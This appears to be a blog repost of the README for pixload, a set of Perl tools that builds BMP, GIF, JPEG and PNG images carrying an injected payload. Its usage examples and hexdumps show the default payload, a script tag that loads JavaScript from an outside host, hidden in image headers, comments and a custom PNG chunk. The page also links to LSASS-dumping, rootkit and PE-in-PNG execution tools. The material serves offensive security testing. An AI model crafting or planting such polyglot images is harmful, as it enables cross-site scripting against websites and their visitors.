Pixload : Image Payload Creating/Injecting Tools

Pixload is a set of tools for creating/injecting payload into images. Useful references for better understanding of pixload and its use-cases:

If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.

Also Read – PrivExchange : Exchange Your Privileges For Domain Admin Privs By Abusing Exchange

SETUP

The following Perl modules are required:

  • GD
  • Image::ExifTool
  • String::CRC32

On Debian-based systems install these packages:

sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

On OSX please refer to this workaround (thnx 2 @iosdec).

TOOLS

bmp.pl

BMP Payload Creator/Injector.

Usage

./bmp.pl [-payload ‘STRING’] -output payload.bmp

If the output file exists, then the payload will be injected into the existing file. Else the new one will be created.

Example

./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/…………| 00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |…………../|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;

gif.pl

GIF Payload Creator/Injector.

Usage

./gif.pl [-payload ‘STRING’] -output payload.gif

If the output file exists, then the payload will be injected into the existing file. Else the new one will be generated.

Example

./gif.pl -output payload.gif
[>| GIF Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.gif

[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

payload.gif: GIF image data, version 87a, 10799 x 32

00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* …….|
00000010 00 00 00 2c 00 00 00 00 20 00 20 00 00 02 1e 84 |…,…. . …..|
00000020 8f a9 cb ed 0f a3 9c b4 da 8b b3 de bc fb 0f 86 |…………….|
00000030 e2 48 96 e6 89 a6 ea ca b6 ee 0b 9b 05 00 3b 2a |.H…………;*|
00000040 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d |/=1;

jpg.pl

JPG Payload Creator/Injector.

Usage

./jpg.pl [-payload ‘STRING’] -output payload.jpg

If the output file exists, then the payload will be injected into the existing file. Else the new one will be created.

Example

./jpg.pl -output payload.jpg
[>| JPEG Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into comment tag
[✔] Payload was injected successfully

payload.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96×96, segment length 16, comment: “”, baseline, precision 8, 32×32, components 3

00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 |……JFIF…..|
00000010 00 60 00 00 ff fe 00 21 3c 73 63 72 69 70 74 20 |.`…..!<script |
00000020 73 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f |src=//nji.xyz></|
00000030 73 63 72 69 70 74 3e ff db 00 43 00 08 06 06 07 |script>…C…..|
00000040 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b |…………….|
00000050 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 |………….. $|
00000060 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 |.’ “,#..(7),0144|
00000070 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 |4.’9=82<.342…C|
00000080 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 |………..2!.!2|
00000090 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 |2222222222222222|
*

000002a6

png.pl

PNG Payload Creator/Injector.

Usage

./png.pl [-payload ‘STRING’] -output payload.png

If the output file exists, then the payload will be injected into the existing file. Else the new one will be created.

Example

./png.pl -output payload.png

[>| PNG Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload [>] Generating output file

[✔] File saved to: payload.png
[>] Injecting payload into payload.png
[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND

[>] Inject payload to the new chunk: ‘pUnk’
[✔] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG……..IHDR|
00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |… … ……..|
00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |…..pHYs…….|
00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |…+……IDATH.|
00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1…….O.a…|
00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ……….I|
00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`……….|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….|
*
000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnk<script sr|
000000d0 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz></sc|
000000e0 72 69 70 74 3e 9d 11 54 97 00 49 45 4e 44 |ript>..T..IEND|
000000ee

DISCLAIMER

The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

R K

Recent Posts

Bomber : Navigating Security Vulnerabilities In SBOMs

bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…

1 day ago

EmbedPayloadInPng : A Guide To Embedding And Extracting Encrypted Payloads In PNG Files

Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…

1 day ago

Exploit Street – Navigating The New Terrain Of Windows LPEs

Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…

3 days ago

ShadowDumper – Advanced Techniques For LSASS Memory Extraction

Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…

4 days ago

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

2 weeks ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

3 weeks ago